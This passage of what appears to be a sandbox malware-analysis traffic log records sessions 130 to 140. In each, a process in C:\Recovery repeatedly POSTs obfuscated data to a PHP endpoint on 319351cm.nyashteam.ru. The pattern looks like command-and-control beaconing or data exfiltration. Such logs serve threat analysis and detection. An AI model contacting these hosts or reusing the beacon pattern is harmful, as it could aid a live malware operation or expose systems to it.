Dec 6, 2024 03:15:09.031224012 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQi0vEM%2FUmnuT2VOy9TqQ6C2UCs26kHAegK2IHesdEjj6Nd5qIDdqqvA734iXgGv47IoBgatdIrn2uujTbABOwsvF8sLmCFF8HnjYeGA%2BC3mn2OuJgVmzeGZGxSg8Y%2FaXAgH%2FIPPsnU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c4370ad37d11-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4241&min_rtt=1811&rtt_var=5540&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=68692&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.6	50123	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:09.276524067 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:09.623775959 CET	1012	OUT	Data Raw: 53 55 5a 5d 59 5a 56 59 5c 56 52 5a 50 59 5a 56 58 5e 5b 57 50 5e 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SUZ]YZVY\VRZPYZVX^[WP^V^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!)#&)23S+6#'+%(0("*>,7?22#_!(8.-']/!Q!,
Dec 6, 2024 03:15:10.374085903 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:10.653619051 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=njX9qQrQr6P%2FggD1CUNGnkPS0J3ZGOwK6muxcPxA2ED6%2FAtfn4L8RlWrwxUWO%2F6tVQkPIXXynKLAmtqONCLVgzTHwiGNKdesDd8ZCe9qw18cnPYM3otTHhXuAgvs2menynoNPTYt5QA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c440ddd68cc3-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4342&min_rtt=1772&rtt_var=5805&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=65368&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.6	50124	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:10.900147915 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.6	50125	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:11.108817101 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:11.467245102 CET	1296	OUT	Data Raw: 53 55 5a 5d 59 5f 56 52 5c 56 52 5a 50 5d 5a 5c 58 53 5b 5a 50 5d 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SUZ]Y_VR\VRZP]Z\XS[ZP]VXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!(0>'T(#]22&<'1)< />15'.=']/!Q!
Dec 6, 2024 03:15:12.205543041 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:12.519922972 CET	960	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGKF%2Bhgnf7TbSaXvYDAOy%2Bwjh4yASr8RiMLW9DaukoKMnGxnoDdc4qpVS4BAh1ypPcTlWoWt%2BO1pK6hHlakDAntp0BpVAWPklJVHmY%2FbTSw0rT4Z2%2BnHLahR6ebOEKsOl3GRyDp5mKI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c44c4ba77cb1-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4280&min_rtt=2003&rtt_var=5306&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=72198&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 5d 25 2e 28 5f 21 0c 2c 13 2e 3e 3c 54 25 3e 29 19 39 38 30 1b 23 2b 29 17 3c 3f 20 56 25 34 27 59 3e 02 35 12 3c 11 2f 57 29 12 23 5b 00 13 25 06 29 3d 04 1b 3e 3a 23 02 31 1d 04 14 2a 18 2d 00 3d 2d 34 08 34 29 32 04 35 13 28 56 33 3d 2c 0e 3b 1b 09 02 2b 24 3e 14 26 34 21 5e 0e 11 3a 09 26 0d 0f 03 20 16 3f 50 25 20 20 5b 3c 3a 2c 10 33 3f 27 56 28 34 2c 10 30 21 3d 54 33 01 27 0c 26 14 29 00 20 2c 27 51 3a 16 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%]%.(_!,.><T%>)980#+)<? V%4'Y>5</W)#[%)=>:#1*-=-44)25(V3=,;+$>&4!^:& ?P% [<:,3?'V(4,0!=T3'&) ,'Q:#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.6	50126	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:11.227443933 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:11.577157974 CET	1012	OUT	Data Raw: 53 56 5a 5c 5c 5b 56 59 5c 56 52 5a 50 5f 5a 5c 58 52 5b 59 50 5b 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SVZ\\[VY\VRZP_Z\XR[YP[VUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP">V!X>&'';:2(%;"Z>/Y!/5%0"('T/']/!Q!4
Dec 6, 2024 03:15:12.352935076 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:12.668808937 CET	812	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMo0xbA9YPBr065lm%2B517ayD6J8mWoR95nY%2BowRkbd%2B9Jno%2BLRaMlPgZvlKy45hPzybXEvi7ueGt8fWbDta2naL4pZHPcxpy82nQR08lglVQZgaalPNJreaK7L%2FJYJFyBUHkktGKXrU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c44d3b03c347-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2883&min_rtt=1636&rtt_var=3108&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=125699&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.6	50127	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:12.915963888 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:15:13.264187098 CET	1012	OUT	Data Raw: 53 51 5f 5e 59 5a 53 5e 5c 56 52 5a 50 5c 5a 52 58 53 5b 5c 50 59 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SQ_^YZS^\VRZP\ZRXS[\PYVUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!*!X)T'?%2(21,$2Y)>$ ,!1:"S/-']/!Q!8
Dec 6, 2024 03:15:14.000737906 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:14.257925034 CET	805	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nyt1GAwpFYO3bAKy6A2TU90WDR8VRpxQEAAFKACPnXcDPUjwNg9xf0r37Ar5DgT1H4aRKEYCeaG%2Bw0l0yrMHSClHwmOjXYJZW0Ca3N489wkowHz4pG3m89PGmbsEZGtmz2%2Bc1NlIh9Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c4578cbb186d-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4053&min_rtt=1659&rtt_var=5410&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=70151&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.6	50128	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:14.507793903 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:14.857949972 CET	1008	OUT	Data Raw: 56 5f 5a 59 5c 5f 56 5e 5c 56 52 5a 50 5a 5a 51 58 59 5b 5a 50 55 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: V_ZY\_V^\VRZPZZQXY[ZPUVYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"V9[,?$&*230!=./4?%W&]!80;']/!Q!4
Dec 6, 2024 03:15:15.625665903 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:15.875469923 CET	810	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VC1KIMt5Eg8JwOZaSRclf0J5wvgxIDizgp9A2JB95oXgDIucFuv4nwExtXikgSug6SiuU%2BDLbe3sz6pS8myJ9woVW%2Fwo95bZgGnoCZtGCOVPN6aov2wczdLp6gES7dNRW2VmxDpd3%2Fo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c461b83878dc-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=20682&min_rtt=16236&rtt_var=14980&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1305&delivery_rate=28182&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.6	50129	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:16.209894896 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:16.563599110 CET	1012	OUT	Data Raw: 53 52 5f 5f 59 5f 53 59 5c 56 52 5a 50 53 5a 5c 58 5e 5b 59 50 5b 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR__Y_SY\VRZPSZ\X^[YP[VZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!#>=?S;&8-%,33;"(!/21:X!;U;-']/!Q!
Dec 6, 2024 03:15:17.295835972 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:17.531177998 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HSGWanr3%2FW4Lk1%2FyYFxd6yr0nkRsYPRKzJLBbdG5b%2FQ56m1a6rs%2BeSFXBUTNqYESyGg2yi78wbyMhUSlFEnRSmzEbBYoArbon3JsOXAt2c%2BGDTsNRgE2hGtxu4ppdqmyIOyAGS7T98E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c46c1b89de99-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4256&min_rtt=1616&rtt_var=5886&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=64206&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.6	50130	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:17.652534962 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:17.998454094 CET	1296	OUT	Data Raw: 56 5f 5f 5c 59 58 56 53 5c 56 52 5a 50 5b 5a 51 58 59 5b 5e 50 5e 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: V__\YXVS\VRZP[ZQXY[^P^VTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"B0?2?S$%2$3]>3Z#Y*%9 !+?W8']/!Q!$
Dec 6, 2024 03:15:18.739722967 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:18.997639894 CET	960	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vpDVE2IOQKoIIcpBeewXWpPT945fKwt17s2PDuHdV%2Fh%2BR46b9zsbpbt4eZd%2BOclw2vp4qelgbSmbg8ByEZ0rIixEitBuG4OYY8NU3CT6eqGRVujAAK%2F81OENC%2BulGa0ncgM54KYQM4A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c4752e9242d7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4155&min_rtt=2402&rtt_var=4407&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=88867&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 5c 25 3d 20 12 35 31 30 5a 39 00 38 50 26 2e 22 03 2d 38 0d 05 23 3b 1b 1a 2b 3f 28 50 27 0a 2f 5f 2a 02 3a 02 3c 01 2c 08 3e 38 23 5b 00 13 26 5b 29 03 39 0b 3e 07 02 5a 26 30 21 04 2a 36 2d 00 2a 3d 2f 14 20 3a 03 5e 36 03 3f 08 33 2e 20 0c 2e 25 2c 5f 28 19 2d 0f 25 0e 21 5e 0e 11 39 1d 25 0d 31 01 23 16 05 55 27 30 27 03 2b 39 24 59 33 2f 27 1f 28 1a 01 0b 27 0f 3e 0e 24 06 20 57 27 2a 26 12 23 3f 3c 08 2e 16 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%\%= 510Z98P&."-8#;+?(P'/_:<,>8#[&[)9>Z&0!6-=/ :^6?3. .%,_(-%!^9%1#U'0'+9$Y3/'('>$ W'&#?<.#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.6	50131	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:17.774772882 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:18.123536110 CET	1012	OUT	Data Raw: 56 54 5f 50 5c 58 53 5c 5c 56 52 5a 50 5c 5a 53 58 5d 5b 57 50 5b 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VT_P\XS\\VRZP\ZSX][WP[VXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"D= >)0<S7&-R&7V3;"[)>Y4?*':85;V8=']/!Q!8
Dec 6, 2024 03:15:18.858072996 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:19.127294064 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qhaa4X%2BemJvn5w7nV4M2WjdG8UNK7ESVvaToK3bTx7WHH%2Ba9lt3yFLgJDkvR3%2FvziUMuUauNx7d%2B88lsteAPVr2Be6ebAgvL0zUdR6tSB7CK8x0%2BEXMnzLCmFwqGhP5nArJaOgEe4jE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c475e9b64378-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4310&min_rtt=1736&rtt_var=5800&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=65371&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.6	50132	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:19.372560024 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:15:19.717365026 CET	1012	OUT	Data Raw: 53 52 5f 59 5c 5d 53 5e 5c 56 52 5a 50 5d 5a 53 58 59 5b 57 50 54 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR_Y\]S^\VRZP]ZSXY[WPTVUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C3:>1#+5,%&/$3;Z4<=W1\86(3T.=']/!Q!
Dec 6, 2024 03:15:20.470738888 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:20.750746965 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07yz6dr6njIXOBFJQvMn7yQNy%2Fwr9tXRd9mK65eMSsQOhIIWafuaZlP73NA3rmClbVNbW%2FZB7Dy33kAF1DjKH7wuXA88rsbTc2H9SEAfiRNv3HUAvytHHtbmhD7Of1I7DAJsPPORc%2Bk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c47feda64357-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4588&min_rtt=1618&rtt_var=6548&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=57516&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.6	50133	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:20.991853952 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
